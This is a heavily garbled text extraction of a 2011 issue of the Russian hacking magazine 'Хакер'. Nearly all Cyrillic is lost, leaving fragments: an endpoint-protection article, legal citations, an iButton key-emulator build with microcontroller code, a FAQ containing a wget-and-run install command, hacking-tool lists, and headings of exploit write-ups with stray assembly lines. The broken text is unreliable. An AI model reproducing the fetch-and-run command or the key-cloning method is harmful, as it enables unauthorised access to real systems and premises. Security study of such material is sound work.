. ,
, Policies.
, New Policy.
. ( , ). ,
Policy Template,
.
, , (UNC, WSUS
Windows Update).
X 09 /152/ 2011
SCCM 2012
-, . ,
. Windows Firewall , . ,
Edit Policy Precedence
.

, SCCM .
FEP
:
Forefront Endpoint Protection
2010 Security Management Pack.

Forefront Endpoint Protection Server Health Monitoring Management
Pack.
Forefront Endpoint Protection 2010.
.
, GPO ,
.
SCCM, Forefront Endpoint

Protection .
, .
, , FEP , - . z
131
SYN/ACK
. .,

!
,

, . ,
. , ,
, ( , ) , , .
- -
(. 1225 1259 ). ,
(. 1257). . , ,
.

.
, , , ,
, . ,
, , /
- ,
(
, ). ,
(),
(. 1227 ). , ,
, , .
?
, ? , .
.
. 1295 .
( ),
.

. - ,
.
(. ).
, . ,
,
. -
(c) .
, .
, , XIV : , .
.
, -
, , , .
132

,
(. 1288 ), ,
. ,
(. 4 .
1233). ,
, .
,
(, ,
, , ),
,
.
(, , ), () . -,
/ - (MSOffice,
1, ).
, , ,
, . .

(. 1 . 1233), ,
(. 1 . 1229). , , , ,
. ? ? ,
* . :
( , );
( );
( ).
,
, ( 50
).
, .
,
. :
, ,
. X 09 /152/ 2011
IP-
IDS Snort
html- ;
Perl, Java, JavaScript, PHP ..
html-
,
(
)
/ ;

.

.
, ,
. , . .
,
.
.
. ,
, .
, .
? , , ?
, .
X 09 /152/ 2011
( ),
.
.
(, )
,
. . . (, )
.
.
.

. - .

133
SYN/ACK
1295.
1265.

www.consultant.ru/popular/gkrf4/79_2.html#p668
base.garant.ru/10164072/70/#41265
1. ,
,
() ( ),
.
1.

, ()
, ,
,

. .
2.
,

.
,
,
,

,
.
,
,

, .

,

.
,

, .
3. , 2

,
,
, ,
,
.
,
,
, , ,
, .

.

.
, ,
, ..

,
() - ,
, .
,
.
, ,
134
2.
( ,
) (
1 1287),
,

.
,

.
,
.
. ,
,
. ,
.
, . , .
(. 2 3 . 146 ).
, 50 000 . ,
, -
.
, .
,
.
, ,
. 50 ( ),
.

(. 7.12 ),
.
,
. ,

. .
. ,
, ,
. , :
X 09 /152/ 2011
) ;
) ;
) ,
.
. :
(. 1301 ).
,
, .
, ,
,

. .
( )
. , , ,
. . ,

, . ,
, ,
.
:
,
, , ;
, ,
, ;
,
;
- ;
. 1262 ;
, , , (,
);

;
, (,
);
/ ,
;
(
, , - );
, , ,
. ,
, ,
.
, .
,
.
, , , .
( )
. . ,
, ,
.
, ,
.
( . 10 ).
. , ,
, , , ,
,
, .
, ,
.
(. 1251 ).
, :
. , ,
,
. , . ,
.
,
1993 , .
,
.
, .
.
. , , , . () .
.
,

, **.
. ,
,
, .
,
: , . ? . . z
* , ,
, , , . ,
( , ) ,
.
** , , . . (, . 3 . 1250
). . , .
X 09 /152/ 2011
135
PHREAKING
dcoder (dcoder.mail@gmail.com)

iButton
,
iButton,
.

. , ,

,
.
, 1-wire
-, . , , , ,
1-wire.
. . , ,
, , ,
(
).
,
. EEPROM . ,
8 EEPROM- ( , 6 ).
, , learn,
,
. ,
,
.
, -
. , . CR2032,
. ,
, 5V VSB ( )
. 5 V, (, ). (5 V ) .
136
1-wire, ,
. , , .
1-wire , , .
( 5 V) .
.
,
. ,
(, DS18b20).
1-wire (master)
(slave). ,
. ,
.
,
.
( )
. , ,
.
(5-10 ), ( 50-100 ).
,
,
.
: RESET, 480 ,
, PRESENCE,
100-200 , ,
X 09 /152/ 2011
. 1. .
()

. 2. 1-wire
RESET. ,
.
:
1. RESET.
2. PRESENCE ( !).
3. ROM-. 8
ROM- ,
. (
DS1990A iButton)
.
4. ROM-
, . ROM-
Read ROM (0x33).
ROM- . DS1990A
0x01. 6 CRC.
(
CRC) EEPROM.
, CRC .
- ,
. :
RESET PRESENCE- .

, , . , ,
.
: , ,
, . X 09 /152/ 2011
, ,
. ,
. ,
,
. ,
.
.
. , ,
- ARM,
ATTiny13. learn, 1-wire, ( ,
) (.
. 6). ,
, NPN. BC846 SMD-, .
(X1) (X2)
. , ,
.
5
. , . (+5) .
(5 V )
. , -. D1,
D2 . , -
137
PHREAKING
( -> )
( -> )
. 3.
D2, D1 . D2 . , 0,2 .
, .
. (. DI HALTa ][ 118, 2008

). .
. ,
. ,
, .
. -
. ,

. ,
FDD. ViewLayout (goo.gl/kRKXE).
.
, - 1,6 .
, , , . , ,
. ,
( ),
. .
. , 95% , AVR
, .
MikroPascal for AVR ( k , ).
2 .
Tiny13 1 -.
, .
, .
ACSR.ACD := 1; //
DDRB := %00010001; //
//: B4 () B0 ()
PORTB := %00001001; //
MCUCR.SM0 := 1; // power down
MCUCR.SE := 1; //
asm sei end; //
, ,
.
GIFR.INTF0 := 1; //
138
GIMSK.INT0 := 1; //
asm sleep end; //!
INT0 ( B1) .
, ( ,
) sleep.
, INT0_rq.
,
. , (
sleep) .
Delay_ms(2); //,
//
DDRB.1 := 1; // RESET
Delay_us(500);
DDRB.1 := 0;
Delay_us(50);
//,
// PRESENCE-
if PINB.1=1 then continue;
// PRESENCE ,
Delay_us(250); //
//PRESENCE-
Read_iButton; //
if CRC_OK <> 0 then continue;
// CRC
. ,
,
. RESET-.
1 DDRB. . ,
, ( , )
PORTB ( ).
DDRB , . ,
DDRB 1, , 0 , pull-up-. RESET , PRESENCE. ,
, - .
, .
, . :
1. ROM- 0x33.
2. 8 , CRC:
CRC_OK.
3. ROM_Data.
CRC 256 . CRC ,
X 09 /152/ 2011
. 4. RESET PRESENCE,

. 5.
CRC := CRC_Table[CRC xor DataByte];. ,
, CRC = 0. CRC , .
ReadROM- CRC_OK. = 0, .
CRC, ,
iButton ( )
(CRC8).
learn. ,
EEPROM,
. , , ,
, EEPROM. .
, ,
.
, , , ?
,
, : , AVR
.
AVR .
.
COM-. USBCOM . PCICOM .
COM- , , .
, , .
,
:).

. , ? :)
1 10 ,
.
. 5.
, . ,
. (, +5 USB),
Vcc .
- ,
, (Gnd).
Uniprof.
.
Uniprof , ,
. ATTiny13,
flash [1K, 64] Tiny13
1 - 64 EEPROM. ,
( ) .
- Erase.
X 09 /152/ 2011

hex ( , firmware).
.
PROG . ,
. 10
.
.
fuse. ,
, .
,
.
CKDIV8, . ,
1,2 , 9,6 . fuse . fuse . - ,
Read ,
. AVR ,
CKDIV8 , . ,
. 6.
Write,
. , .
, .
, - ,
:). , , AVR
1-wire. ,
. , ,
. . z
139
UNITS
faq
united?

faq@real.xakep.ru
Q: DDoS.
wget http://www.inetbase.com/scripts/

ddos/install.sh

chmod 0700 install.sh
- ./install.sh
?
A: -
Q:

. ?

, ?
A:
, iptables.
, ,

(, ). ,
.
(D)DoS Deflate
(deflate.medialayer.com). bash-,
IP-,
, .
:
,

. : iptables
Advanced Policy Firewall (APF). DoS Deflate :
.
-, ,

. ,
(
), , .

,
:
Adminus Malware Analysis Group Samples
(adminus.net/samples.aspx);
Contagio Malware Dump (contagiodump.
blogspot.com);
KernelMode.info (www.kernelmode.info/
forum/viewforum.php?f=16);
MalwareBlacklist (www.malwareblacklist.
com/showMDL.php);
MalwareBytes Forum (forums.
140
/usr/local/ddos/ddos.
conf NO_OF_CONNECTIONS.

,
,
NAT. ,
.
,

,
. ,

,
.

,

, : .
X 09 /152/ 2011

Google

malwarebytes.org);
NovCon Twitter EXE Parsing
(minotauranalysis.com/exetweet);
Offensive Computing (www.
offensivecomputing.net);
SecuBox Labs (secuboxlabs.fr).
-,
, ,
.
URL www.malwaredomainlist.
com www.malwareurl.com.
: ,

, , ,
, .
-,
honeypot,
. ,
.
Q: ,
?
A: ,
100%
. :
Glastopf (glastopf.org) ,
-
.
.
Dionaea (dionaea.carnivore.it) ,
.

Windows,
.
Dionaea

.
Jsunpack-n (code.google.com/p/jsunpack-n)

.
, -
.
, X 09 /152/ 2011
, Omnivora (sourceforge.net/projects/
omnivora) Amun (sourceforge.net/projects/
amunhoney).
Q:
,
?
A:
,
,
Intel Core i5/i7. , Intel
vPro
KVM Remote Control. KVM
(Keyboard Video Mouse)
: KVM-

, . KVM Intel?
,
,
.
,
, ,
. ,

Remote FrameBuffer
( VNC), , ,

, .
Android, ?

.
, ,
.

Intel (intel.ly/pgTnGM),
vPro .
KVM Remote Control
Support. :
,
.
Q: -
Wi-Fi- ?

-
.
.

A: 1.
( omni antenna).
2.
.
, , DD-WRT,

.
Wireless
Advanced Settings,
TX Power,
.
, , 70,

100 ( ,
).
,
. AP
150
.
DD-WRT,
(www.dd-wrt.com).
3.

, .
Wi-Fi (, inSSIDer) ,
.
.
4. ,
AP (
) .
. DD-WRT
Wireless Basic Settings Repeater.
: Wireless Physical Interface (wl0)
Virtual Interfaces (wl0.1).

, SSID
.
Wireless Security
.
141
UNITS
Q: ? , .
A: ,
, , .
Wi-Fi, ,

.
,
.
. ,

.
WiFuzz (code.google.com/p/
wifuzz), ,
.
Python-
Scapy, .
Q: . ,
.
.
?
A: ProduKey
(www.nirsoft.net),
Microsoft Office, Windows, Exchange Server
SQL Server.

( ).
%windir%\
system32\config.
Q: -
Dropbox, .
. ?
A: Dropbox SparkleShare (sparkleshare.org).

,
.
Linux
Mac,
.
github.
com/hbons/SparkleShare.
Q: PowerShell/BAT

. , Windows
,
.
?
A:
WinAPI,
142

.
notifu (www.paralint.
com/projects/notifu).

,
, . , :
notifu /m "Hello, man!"
,
notifu
.
Q: BAT-? , ,
,
.

PowerScript VBScript.
A: , , ,

exe-. ,
Quick Batch File Compiler (www.abyssmedia.
com/quickbfc). VBScript
JavaScript ScriptCryptor Compiler
.
PowerScript,
Make-PS1ExeWrapper (bit.ly/paIgIW).
PrimalScript (www.sapien.com/
software/primalscript),
.
Q:
(- !) ?
A: ,

.

JavaScript,
.

heatmap ,
.
-
,
.
,
, - .
ClickHeat (www.labsmedia.
com/clickheat).
Google
Analytics ..
Q: GMail
,
? ,
/
, . ,
? :)
A: !
,
,

Google.
,
( Multiple sign-in)
.
google.
com/accounts. , Google
,
.
Q:
-.
,
,

.
A:
Plupload (www.plupload.com),

, dragndrop,
,
..

, , , HTML5.
HTML, :
Flash, Gears, Silverlight, BrowserPlus
HTML4. .
Q: , -
Android.
: Android
Market !
?
A: . ,

Android Market , .
,
Android Market
. ,

.
Market
enabler (code.google.com/p/market-enabler).
z
X 09 /152/ 2011
>Net
Angry IP Scanner 3.0-beta6
Axence NetTools 4.0
Cloud Turtle
G+ Notifier 1.7
GPING (Graphical Ping) 1.0.2
Helicon Ape 0068
JStock 1.0.6d
NetGrok
>>UNIX
>Desktop
3dDesktop 0.2.8
Audacious 3.0
Compiz 0.9.5
digiKam 2.0
>Security
Auto Rooter Beta 2011
avast! Linux Home Edition 1.3.0
AVIRA AntiVir Workstation 3.0.2
Complemento 0.7.6
Damn Small SQLi Scanner v0.1f
exploitdbee
F-Prot Antivirus 6.0.3
Firecat 1.6
IP Flood Detector 1.0
Iscanner 0.5
Mantra Security Toolkit 0.6.1
>Net
BitTorrent 5.2.2
DreaMule 3.2
Dropbox 1.1.35
Flush 0.9.11
Google Chrome 13
JAP 00.15.018
Kommute 0.24
Kopete 1.0
Mozilla Firefox 5.0.1
Mumble 1.2.3
Opera 11.50
ProZilla 2.0.4
QuickDownloader 5.0
RealVNC 4.4.3
Teamwork 4.7
theMeStream
Ttcp
>>MAC
Afloat 2.4
atMonitor 2.7b
Backuplist+ 8.0.3
Boxer 1.1.1
Game Hunter 1.1.17
Google Chrome 13
iChm 1.4.3
Integrity 3.7
MacHacha 4.0.1
MakeMKV 1.6.13
Optimizer 1.2
Praat 5.2.35
qBitTorrent 2.8.1
TotalTerminal 1.1.1
Ukelele 2.1.7
XRG 1.6.1
YoruFukurou 2.61
YouTube to MP3 1.5
YouView 0.5 Beta 4
>X-distr
Gentoo Linux 11.2
>System
Aircrack-ng 1.1
AMD Catalyst 11.7
Cpuburn 1.4
CpuTemp 0.1
E2fsprogs 1.41.14
EncFS 1.7.0
LDAP Account Manager 3.4.0
Linux Kernel 3.0.1
Nvidia 280.13
Open Hardware Monitor 0.3.2
Qtnotifydaemon 1.0.4
Shake 0.999
Squashfs 3.4
Ubuntu Tweak 0.5.14
VirtualBox 4.1
>Server
Apache 2.2.19
BIND 9.8.0
CUPS 1.5.0
DHCP 4.2.1
Moment Video Server 1.0
MySQL 5.5.15
nginx 1.1.0
OpenLDAP 2.4.26
OpenSSH 5.8
OpenVPN 2.2.1
PostgreSQL 9.0.4
Samba 3.5.11
Sendmail 8.14.5
Squid 3.1.14
XMail 1.27
Metagoofil 1.4b
Rootkit Hunter 1.3.6
SquidClamAv 6.3
Social-Engineer Toolkit 1.5.3
Sqlninja 0.2.5
Webtest 1.2.1
WPScan
>Multimedia
Blumind 1.3
Doro 1.64
Graphs Made Easy 3.1
MiniLyrics 7.1

:
EasyRecovery 6.1 Professional
(Demo)
File Scavenger
GetDataBack for NTFS V4.21
GetDataBackfor FAT V4.21
R-Studio 5.4
Recuva 1.40
R.saver 1.0
RecoverMyFiles 4.7.2
UFS Explorer Standard Recovery
4.9.2
>System
Appupdater 1.5
Auslogics Disk Defrag 3.2.1
Autoruns 10.07
Comodo System-Cleaner 3.0
DualMonitor Taskbar
ExactFile 1.0
Folder Replica 1.03
GrokEVT 0.5.0
Microsoft Security Essentials
Multi Commander 1.1.1.800
Metamorphose 1.1.2
ProEject 1.0
QtdSync v0.6.15 beta
RAID Reconstructor 4.21
ServiWin 1.48
ShutdownGuard 1.0
USB Flash Benchmark
xplorer lite
>Devel
Apache Ant 1.8.2
Bison 2.5
Crow Designer 2.99.0
Fasm 1.69.31
Glade 3.10.0
Gnat 2011
Intel C++ Compiler 12.0.2
Java SE 7
LevelDB
libjpeg 7
Libnet 1.1.2.1
libusb 0.1.12
Monkeybars 1.0.4
Qooxdoo 1.5
Rats 2.3
TkInter 2.4.2
Waf 1.6.4
zlib 1.2.5
Dynamic window manager 5.9

Hash Checker 4.0.1
JShot 2.0
Kat 0.6.4
Kpackage 3.5.10
NeroLINUX 4.0.0.0
Openbox 3.4.11.2
PieDock 1.4.0
RawTherapee 3.0
Splashy 0.3.13
Wbar 1.3.3
Xfce 4.8.0
XWinWrap 0.10
)
UI-:
360desktop 0.8.5
Acer Gridvista 2.72.317
Bins
Desktops 1.02
eXtra Buttons
Fences
Gmail Notifier Plus 2.1.2
HashTab 4.0
JumpPad 2.1
Launchy 2.6B2
Listary
multibar 1.1.1.0
QTTabBar 2.0.0.0beta
SuperbarMonitor
Switcher 2.0.0
Taskbar Meters 1.1
TeraCopy 2.2 beta 3
Windows 7 Taskbar Items Pinner
>Misc
Blumind 1.3
Gest
Metro Clock 2
Metro Sidebar 1.0
Multi-Tabber 1.0
nSpaces
PowerGDocs 1.1
Tabbles 2.0
WindowsRunHistoryEditor 1.2.0.0
>Games
Subvein 0.692
>Security
Cain & Abel v4.9.41
CrashMe
Durandal
FindBugs 1.3.9
Heap Inspector 1.1
IDR 2.5.2.11 beta
mediggo 0.4.0
Metasploit 4.0
Patriot NG v2.01
PDF Stream Dumper
Process Hacker 2.10
Visual DuxDebugger 2.8
VMSweeper 1.4 Beta 12
Volatility 2.0
Uniform Server 7.1.4

VNC Free Edition for Windows 4.1.3
Wifi Network Backup Manager Utility
Windows Firewall Notifier 1.0.1
Wireless Network Watcher 1.15
Wireshark 1.6.1
zFTPServer Suite 2010-10
09(152) 2011
>>WINDOWS
>Development
GanttProject 2.0.10
IntelliJ IDEA 10.5.1 Free Community
Edition
Jailer 3.6.4
Java SE Development Kit 7
Node.JS 0.5.3
PhoneGap 1.0
Sublime Text 2
Syser Kernel Debugger
1.99.1900.1220 Trial
Syser Win32 Debugger Free
Titanium Studio
wyBuild 2.6
x
,
JAVASCRIPT 050

ANDROID 070
PHPMYADMIN
064

WINDOWS 7
, ,
FOX NEWS
082

: 2
10
.
LULZSEC
09 (152) 2011
GOOGLE CHROME 030
UNITS
HTTP://WWW2
FETCH.IO
fetch.io
CRYPTOCAT
crypto.cat
,
,
Rapidshare, . (, 100-
- ), . ,
JDownloader (jdownloader.org),

CAPTCHA, ,
. 100%- . fetch.io (, Premium-)
(Despositfiles, Rapidshare,
MegaUpload ..) P2P- ( BitTorrent) . ,
, ,
.

.
OTR (Off-theRecord), cryptocat ,
.
( JavaScript ). -
AES-256
.
, . 30 ,
SSL-.
cryptocat, , GitHub (github.com/kaepora/cryptocat).
KEEPMEOUT!
keepmeout.com
KICKSTARTER
www.kickstarter.com
,
, ,
.
Facebook,
, -
, KeepMeOut!.
, .
, KeepMeOut! ,
60 .
, .
. , vkontakte.ru
KeepMeOut! 6- .
- , . ,
, . ,
, !
(, ,
, , , , ) , .
,
, , .
. ,
500 (www.hexbright.com)
$31 000. , ,
,
$259,293. , ?
144
X 09 /152/ 2011

Хакер 2011 09 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Хакер 2011 09 PDF

Uploaded by

Copyright:

Available Formats

x 09 (152) 2011

GOOGLE CHROME 030

LULZSEC / : , , FOX NEWS

OWASP AppSec Europe 2011:

Pwnie Awards 2011

: RedEye, Crutop, Fethard Chronopay

Windows Phone 7.1

Forefront Endpoint Protection:

.: (495) 935-7034, : (495) 545-0906

WEXLER.HOME 903 Windows 7 .

Intel Core i5-650 3,2 - 4 . CPU

GeForce GTX 460,

Microsoft $250 000

Microsoft. Microsoft Malware Protection Center (MMPC)

Food Not Bombs.

SAFETY AND SECURITY CENTER

-: mATX, ATX Flex ATX, E-ATX, XL-ATX

-: Mini-ITX, mATX, ATX

GIGABYTE Cupio 6140

-: mATX, ATX, SSI CEB

-: mATX, ATX, E-ATX

, ColorVision Spyder 3 Elite.

. , Samsung S27A750D . 19801080 . ,

NAS, , . QNAP TS-459 Pro II Intel Atom D525,

QNAP TS-459 Pro II

UFS Explorer Recovery

PC INSPECTOR File Recovery

Damn Small SQLi Scanner

Magic Boot Disk

Trinity Rescue Kit

Redo Backup Live CD

Web Server Notifier

Chrome Sniffer Wappalyzer

Web Technology Notifier

Request Maker bit.ly/oRVhVW

Firefox Tamper Data,

Advanced REST client

Edit This Cookie bit.ly/pLCa0N

Swap My Cookies bit.ly/ojcXXU

Anti XSS bit.ly/o78fKn

XSS Rays bit.ly/qZwexS

Firebug lite for Chrome

iMacros for Chrome

Windows 7 Taskbar Items Pinner

Gmail Notifier Plus

NTSD Microsoft NT Symbolic Debugger, , .

copy c:\windows\system32\cmd.exe \\.\c:\CON

MS Office 2010 RTF Header Stack

CVSS V2 BASE SCORE:

MOV EAX,DWORD PTR DS:[ECX]

content << "}"

MOV DWORD PTR DS:[ECX],EAX

MOV DWORD PTR DS:[ECX],EAX

MOV ECX,DWORD PTR DS:[EAX]

MOV EAX,DWORD PTR DS:[ECX]

MOV EAX,DWORD PTR DS:[ECX]

REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

Adobe Reader X Atom Type Confusion

CVSS V2 BASE SCORE:

XSS- Joomla! 1.6.3

SQL- WordPress 3.1.3

com_search searchword POST-

466: $trg_db = $_SESSION['trg_db'];